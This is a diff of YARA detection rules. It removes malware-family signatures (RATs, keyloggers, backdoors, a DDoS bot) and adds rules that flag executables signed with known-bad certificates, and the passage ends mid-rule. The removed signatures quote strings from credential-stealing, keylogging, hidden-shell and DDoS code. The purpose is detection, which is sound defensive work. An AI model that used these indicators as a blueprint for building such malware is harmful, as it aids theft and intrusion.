+rule DITEKSHEN_INDICATOR_KB_CERT_279B3A26F16A069Aa7Bca1811D44Ad9B : FILE
 {
 	meta:
-		description = "ObliqueRAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5a184299-6c16-56b3-88da-37435fbfcde5"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "3ead1500-d510-5a9b-8a19-19f9f7f2cf95"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L294-L314"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4857-L4873"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b8bbf031364b828a972c52e1a8985ff65601ca7413e6e7ae3a5be981f086b9e"
+		logic_hash = "5a01fd3db421a4b41318fa1264e8bc621ddeddb44b82b8f0b15e97eccec616e8"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\ProgramData\\auto.txt" fullword ascii
-		$s2 = "C:\\ProgramData\\System\\Dump\\" fullword ascii
-		$s3 = "C:\\ProgramData\\a.txt" fullword ascii
-		$s4 = "Oblique" fullword ascii
-		$s5 = /(Removable|Hard|Network|CD|RAM)\sDisk\|/ ascii
-		$s6 = "backed" fullword ascii
-		$s7 = "restart" fullword ascii
-		$s8 = "kill" fullword ascii
-		$s9 = /(John|JOHN|Test|TEST|Johsnson|Artifact|Vince|Serena|Lisa|JOHNSON|VINCE|SERENA)/ ascii nocase
-		$v1 = "C:\\ProgramData" fullword ascii
-		$v2 = "auto" fullword ascii
-		$v3 = "plit" fullword ascii
-		$v4 = ":image/jpeg" fullword wide
+		thumbprint = "4a9fc15f1d63145b622989c4f5bec4612095401e"
+		hash1 = "fc642048d9f0b8cb36649fd377fdb68dce3998f2a88e8c64acdc4e88435f2562"
+		hash2 = "914067034336e4ed8b56e66d6be29f34477d9fb38ba73095a3edca5ec9cb1a9c"
+		hash3 = "daf7e148f82807808cac8a21b1a3ce43491c3a140420442a1c1ee2d497a9e0a2"
+		hash4 = "3727044bebe4a14aed66df5119c11471a57b50c57ab4baaef4073323206d3b9b"
+		hash5 = "f0239d16f77b11e6b606b23a53c9e563f6360a27a03c0b9cf83b151ee8ee9088"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DEVLIN LIMITED" and pe.signatures [ i ] . serial == "27:9b:3a:26:f1:6a:06:9a:a7:bc:a1:81:1d:44:ad:9b" )
 }
-rule DITEKSHEN_MALWARE_Win_Firebirdrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_07Cef66A71C35Bc3Aed6D100C6493863 : FILE
 {
 	meta:
-		description = "Firebird/Hive RAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "456ae70e-8004-5fb0-a4fd-ce7c0f4704f9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e07b0a2c-64ff-5e12-9f19-00a67a13fb89"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L316-L339"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4875-L4886"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1c24e924171db1b99a3b03764f4551b6f4b6b1c9c6147b49dbc0651e85e9040c"
+		logic_hash = "24b89e65bc9d60a60e57f749735214c462e56c3194906e4bca52d74463617be4"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Firebird-HiveRAT"
-
-	strings:
-		$id1 = "Firebird Remote Administration Tool" fullword wide
-		$id2 = "Welcome to Firebird! Your system is currently being monitored" wide
-		$id3 = "Hive Remote Administration Tool" fullword wide
-		$id4 = "Welcome to Hive! Your system is currently being monitored" wide
-		$s1 = "REPLACETHESEKEYSTROKES" fullword wide
-		$s2 = "_ENABLE_PROFILING" fullword wide
-		$s3 = ": KeylogSubject" wide
-		$s4 = "Firebird.CommandHandler" fullword wide
-		$s5 = "webcamenabled" fullword ascii
-		$s6 = "screenlogs" fullword ascii
-		$s7 = "encryptedconnection" fullword ascii
-		$s8 = "monitoron" fullword ascii
-		$s9 = "screenGrab" fullword ascii
-		$s10 = "TCP_TABLE_OWNER_PID_ALL" fullword ascii
-		$s11 = "de4fuckyou" fullword ascii
+		thumbprint = "9f65b1f0bed6e58ecdcc30b81b08b350fcc966a1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 7 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" )
 }
-rule DITEKSHEN_MALWARE_Win_Phoenix : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D3356318924C8C42959Bf1D1574E6482 : FILE
 {
 	meta:
-		description = "Phoenix/404KeyLogger keylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "62101881-9b5e-586d-8e1b-184787f25d6b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "7e23e9cf-5a34-55bb-a88d-4c0aef411372"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L341-L367"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4888-L4899"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2c2a4ffc36d708a121853fb0268e6dc85b3fe2cd58e05c8124cbef18e03ec0b"
+		logic_hash = "86ca8da7e9e704f64be8ecd9e270108337d28b540ba8cd669a8d536ccfefea95"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Phoenix-Keylogger"
-
-	strings:
-		$s1 = "FirefoxPassReader" fullword ascii
-		$s2 = "StartKeylogger" fullword ascii
-		$s3 = "CRYPTPROTECT_" ascii
-		$s4 = "Chrome_Killer" fullword ascii
-		$s5 = "Clipboardlog.txt" fullword wide
-		$s6 = "Leyboardlogs.txt" fullword wide
-		$s7 = "Persistence'" wide
-		$s8 = "set_HKB" fullword ascii
-		$s9 = "loloa" fullword ascii
-		$s10 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" fullword wide
-		$m1 = "- Screenshot -------|" ascii wide
-		$m2 = "- Clipboard -------|" ascii wide
-		$m3 = "- Logs -------|" ascii wide
-		$m4 = "- Passwords -------|" ascii wide
-		$m5 = "PSWD" ascii wide
-		$m6 = "Screenshot |" ascii wide
-		$m7 = "Logs |" ascii wide
+		thumbprint = "e21f261f5cf7c2856bd9da5a5ed2c4e2b2ef4c9a"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or 3 of ( $m* ) ) or 9 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" )
 }
-rule DITEKSHEN_MALWARE_Win_Backnet : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_038Fc745523B41B40D653B83Aa381B80 : FILE
 {
 	meta:
-		description = "BackNet payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c53ef72f-4957-5ddb-b096-dcdb69cf900d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "ed7581eb-52e7-5216-86a2-079bc5741b05"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L369-L386"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4901-L4912"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c276f2b809caad680455fc4ca0a021887d4ff2c9114f05737542a1d3c5cca848"
+		logic_hash = "b760525c38610b8a5cc990335122eab81cb895dc523908ef841c5c3117a1a372"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.BackNet"
-
-	strings:
-		$s1 = "Slave.Commands." fullword ascii
-		$s2 = "StartKeylogger" fullword ascii
-		$s3 = "StopKeylogger" fullword ascii
-		$s4 = "KeyLoggerCommand" fullword ascii
-		$s5 = "get_keyLoggerManager" fullword ascii
-		$s6 = "get_IgnoreMutex" fullword ascii
-		$s7 = "ListProcesses" fullword ascii
-		$s8 = "downloadurl" fullword wide
-		$pdb = "\\BackNet-master\\Slave\\obj\\Release\\Slave.pdb" ascii
+		thumbprint = "05124a4a385b4b2d7a9b58d1c3ad7f2a84e7b0af"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $pdb or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" )
 }
-rule DITEKSHEN_MALWARE_Win_Acridrain : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ac0A7B9420B369Af3Ddb748385B981 : FILE
 {
 	meta:
-		description = "AcidRain stealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9890c9e0-ce53-5f08-9077-c73a9e4ba29c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0935fd31-3d8f-57d2-a00e-ad7d5cdbe12d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L388-L401"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4914-L4925"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "11884073f4bf466503b07f297ae7fad188f79df148fcc7ca48827c7dbd07e211"
+		logic_hash = "47dca0d0b84dd0d210cf7fdda3bcce796d090e5de3f4266bbed01eebdd397bfa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = { 43 6f 6f 6b 69 65 73 (5c|2e) }
-		$s2 = { 74 65 6d 70 6c 6f 67 69 ?? }
-		$s3 = { 74 65 6d 70 50 ?? 68 }
-		$s4 = "Connecting to hostname: %s%s%s" fullword ascii
-		$s5 = "Found bundle for host %s: %p [%s]" fullword ascii
-		$s6 = "encryptedUsernamencryptedPassworERROR Don't copy string" fullword ascii
+		thumbprint = "15b56f8b0b22dbc7c08c00d47ee06b04fa7df5fe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" )
 }
-rule DITEKSHEN_MALWARE_Linux_Chachaddos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00913Ba16962Cd7Eee25965A6D0Eeffa10 : FILE
 {
 	meta:
-		description = "ChaChaDDoS variant of XorDDoS payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "78a5cf3a-0e84-59bd-a936-bd335647e3d0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "7a053089-44c8-5f30-8eee-dcd4ba24efe8"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L403-L418"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4927-L4938"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2bf99771046650820f02a24d5bd825afeacd03d1e865b05d8563a3ef74d521fb"
+		logic_hash = "a2e729c053d1a9d5895dc2247ea0804525f8f1744875d5c2f96b4255ad325dc5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "[kworker/1:1]" ascii
-		$x2 = "-- LuaSocket toolkit." ascii
-		$x3 = "/etc/resolv.conf" ascii
-		$x4 = "\"macaddress=\" .. DEVICE_MAC .. \"&device=\" .." ascii
-		$x5 = "easy_attack_dns" ascii
-		$x6 = "easy_attack_udp" ascii
-		$x7 = "easy_attack_syn" ascii
-		$x8 = "syn_probe" ascii
+		thumbprint = "079aeb295c8e27ac8d9be79c8b0aaf66a0ef15de"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JMT TRADING GROUP INC" and pe.signatures [ i ] . serial == "00:91:3b:a1:69:62:cd:7e:ee:25:96:5a:6d:0e:ef:fa:10" )
 }
-rule DITEKSHEN_MALWARE_Multi_Exaramel : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F44A91704F9Ea388446D2635F2A8C8A5 : FILE
 {
 	meta:
-		description = "Exaramel Windows/Linux backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "014f10f3-4502-5719-93f6-4b2940f53876"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "52f08ec1-fb83-59bc-bb90-2ae12245c0f7"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L420-L459"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4940-L4953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e64383304bc913b07a2e63d61c81354b996c01171357005f4a28957d4d889599"
+		logic_hash = "cec66648ecde5b11a2a20674b2e1f10c8b917ebeb26ddba0ead2b6af45c8519b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig1 = "MALWARE_Linux.Backdoor.Exaramel"
-		clamav_sig2 = "MALWARE_Win.Backdoor.Exaramel"
-
-	strings:
-		$s1 = "vendor/golang_org/x/crypto/" ascii
-		$s2 = "vendor/golang_org/x/net/http2" ascii
-		$s3 = "vendor/golang_org/x/text/unicode" ascii
-		$s4 = "vendor/golang_org/x/text/transform" ascii
-		$s5 = "config.json" ascii
-		$cmd1 = "App.Update" ascii
-		$cmd2 = "App.Delete" ascii
-		$cmd3 = "App.SetProxy" ascii
-		$cmd4 = "App.SetServer" ascii
-		$cmd5 = "App.SetTimeout" ascii
-		$cmd6 = "IO.WriteFile" ascii
-		$cmd7 = "IO.ReadFile" ascii
-		$cmd8 = "OS.ShellExecute" ascii
-		$cmd9 = "awk 'match($0, /(upstart|systemd|sysvinit)/){ print substr($0, RSTART, RLENGTH);exit;" ascii
-		$ws1 = "/commands/@slp" wide
-		$ws2 = "/commands/cmd" wide
-		$ws3 = "/settings/proxy/@password" wide
-		$ws4 = "/settings/servers/server[@current='true']" wide
-		$ws5 = "/settings/servers/server/@current[text()='true']" wide
-		$ws6 = "/settings/servers/server[text()='%s']/@current" wide
-		$ws7 = "/settings/servers/server[%d]" wide
-		$ws8 = "/settings/storage" wide
-		$ws9 = "/settings/check" wide
-		$ws10 = "/settings/interval" wide
-		$ws11 = "report.txt" wide
-		$ws12 = "stg%02d.cab" ascii
-		$ws13 = "urlmon.dll" ascii
-		$ws14 = "ReportDir" ascii
+		thumbprint = "573514c39bcef5690ab924f9df30577def6e877f"
+		hash1 = "d67dde5621d6de76562bc2812f04f986b441601b088aa936d821c0504eb4f7aa"
+		hash2 = "71f60a985d2cc9fc47c6845a88eea4da19303a96a2ff69daae70276f70dcdae0"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x457f and ( all of ( $s* ) and 6 of ( $cmd* ) ) ) or ( uint16( 0 ) == 0x5a4d and 12 of ( $ws* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Binance" and pe.signatures [ i ] . serial == "f4:4a:91:70:4f:9e:a3:88:44:6d:26:35:f2:a8:c8:a5" )
 }
-rule DITEKSHEN_MALWARE_Linux_Hiddenwasp : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_029685Cda1C8233D2409A31206F78F9F : FILE
 {
 	meta:
-		description = "HiddenWasp backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "220e5e6e-7c5c-5f70-b3eb-50d9c5ec636d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2c1d858b-3adc-5c05-bc72-2a6f12f7245e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L461-L486"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4955-L4966"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2aad022de41ba2633fc92a7dc5a5fa2efde9da2211cfc01fb2999e33365d6c9"
+		logic_hash = "a7eec901d92d6126cbc4468d7f2fbccc905f550c7dc8d28b405f583cfde9aea3"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-		clamav_sig1 = "MALWARE_Linux.Trojan.HiddenWasp-ELF"
-		clamav_sig2 = "MALWARE_Linux.Trojan.HiddenWasp-Script"
-
-	strings:
-		$x1 = "I_AM_HIDDEN" fullword ascii
-		$x2 = "HIDE_THIS_SHELL" fullword ascii
-		$x3 = "NewUploadFile" ascii
-		$x4 = "fake_processname" ascii
-		$x5 = "swapPayload" ascii
-		$x6 = /Trojan-(Platform|Machine|Hostname|OSersion)/ fullword ascii
-		$s1 = "FileOpration::GetFileData" fullword ascii
-		$s2 = "FileOpration::NewUploadFile" fullword ascii
-		$s3 = "Connection::writeBlock" fullword ascii
-		$s4 = /hiding_(hidefile|enable_logging|hideproc|makeroot)/ fullword ascii
-		$s5 = "Reverse-Port" fullword ascii
-		$s6 = "hidden_services" fullword ascii
-		$s7 = "check_config" fullword ascii
-		$s8 = "__data_start" fullword ascii
-		$s9 = /patch_(suger_lib|ld|lib)/ fullword ascii
-		$s10 = "hexdump -ve '1/1 \"%%.2X\"' %s | sed \"s/%s/%s/g\" | xxd -r -p > %s.tmp"
+		thumbprint = "86574b0ef7fbce15f208bf801866f34c664cf7ce"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 4 of ( $x* ) or all of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE" and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" )
 }
-rule DITEKSHEN_MALWARE_Multi_Wellmess : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aebe117A13B8Bca21685Df48C74F584D : FILE
 {
 	meta:
-		description = "WellMess Windows/Linux backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cfa0f077-9d45-5796-b888-66fb397e74f8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2b9c40e8-9c0e-523d-b746-4e31d0a780e0"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L488-L510"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4968-L4979"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cbbca609fd289d7406d9073237688d250dc68c450676b9b755509540d8f76a5"
+		logic_hash = "cb17c6f311d88125ad0c790c61fe0dd1ffbdefdbea45ffb54c47da5d98f99900"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig1 = "MALWARE_Win.Trojan.WellMess_DotNet"
-		clamav_sig2 = "MALWARE_Win.Trojan.WellMess_Golang"
-		clamav_sig3 = "MALWARE_Linux.Trojan.WellMess_Golang"
-
-	strings:
-		$s1 = "-----BEGIN PUBLIC KEY-----" ascii
-		$s2 = "-----END PUBLIC KEY-----" ascii
-		$s3 = "net/http.(*persistConn).readResponse" ascii
-		$s4 = "net/http/cookiejar.(*Jar).SetCookies" ascii
-		$s5 = "_/home/ubuntu/GoProject/src/bot/botlib" ascii
-		$s6 = "<;head;><;title;>" ascii
-		$s7 = "<;title;><;service;>" ascii
-		$s8 = "http://invalidlookup" ascii
-		$s9 = "<autogenerated>" ascii wide
+		thumbprint = "4dc9713dfb079fbae4173d342ebeb4efb9b0a4dc"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" )
 }
-rule DITEKSHEN_MALWARE_Win_Konni : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_38989Ec61Ecdb7391Ff5647F7D58Ad18 : FILE
 {
 	meta:
-		description = "Konni payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "86eae9f6-60b0-5720-8528-ddbe32b6d4a6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "40c742ec-f683-57fe-bb35-7c44617f9199"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L512-L530"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4981-L4992"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d57c51f7ede28b74395e5e0fbcc5fd9247b3353330f3e549d5abf99bbd7a1b93"
+		logic_hash = "f2108c41c814a815047268d9934a01231936a1cf73cbb92476eb96c9fe4b1091"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "uplog.tmp" fullword wide
-		$s2 = "upfile.tmp" fullword wide
-		$s3 = "%s-log-%s" fullword ascii wide
-		$s4 = "%s-down" ascii wide
-		$s5 = "%s-file-%s" fullword ascii wide
-		$s6 = "\"rundll32.exe\" \"%s\" install" fullword wide
-		$s7 = "subject=%s&data=" fullword ascii
-		$s8 = "dll-x64.dll" fullword ascii
-		$s9 = "dll-x32.dll" fullword ascii
-		$pdb1 = "\\virus-dropper\\Release\\virus-dropper.pdb" ascii
-		$pdb2 = "\\virus-init\\Release\\virus-init.pdb" ascii
+		thumbprint = "71e74a735c72d220aa45e9f1b83f0b867f2da166"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $pdb* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" )
 }
-rule DITEKSHEN_MALWARE_Win_Bitterrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D08D83Ff118Df3777E371C5C482Cce7B : FILE
 {
 	meta:
-		description = "BitterRAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cccb2102-b78a-59ce-98e6-c702c4bec4d4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "d4857ec5-2c99-51f8-a5b8-938c8d83169e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L532-L551"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4994-L5005"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f9dec388af6ddc767f82d7de7ba47754e76058022e6e55bbafd846ca8655a03b"
+		logic_hash = "b6c7f5c57c79d11132535bedce77276f67c4f854f5e8ef2c12aced64f8a188d0"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.BitterRAT"
-
-	strings:
-		$s1 = "getfile" fullword wide
-		$s2 = "getfolder" fullword wide
-		$s3 = "winmgmts://./root/default:StdRegProv" fullword wide
-		$s4 = "winlog" fullword wide
-		$s5 = "winprt" fullword wide
-		$s6 = "c:\\intel\\" fullword ascii
-		$s7 = "AXE: #" fullword ascii
-		$s8 = "Bld: %s.%s.%s" fullword ascii
-		$s9 = "53656C656374202A2066726F6D2057696E33325F436F6D707574657253797374656D" wide nocase
-		$pdb1 = "\\28NovDwn\\Release\\28NovDwn.pdb" ascii
-		$pdb2 = "\\Shellcode\\Release\\Shellcode.pdb" ascii
+		thumbprint = "8a1bcf92ea961b8bc8817b0630f34607ccb5bff2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $* ) or ( 4 of ( $s* ) and 1 of ( $pdb* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" )
 }
-rule DITEKSHEN_MALWARE_Win_Tjkeylogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_249E3F1B7595E7D0Fe6Df13303287343 : FILE
 {
 	meta:
-		description = "TJKeylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6aaa11b2-3734-5538-b593-f5276f3acc72"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "3f780428-a482-5201-a7ca-d3608779a5e4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L553-L567"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5007-L5018"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "52d98a6f5a2cfc6717b7097b4e70c1e813851222f9f06ae74be4e5703b0b0dde"
+		logic_hash = "4df122a53f2c1a08d1694c8e64b802f58507bb985f1aed8c91e6d7ad24906fca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "TJKeyLogger" fullword ascii
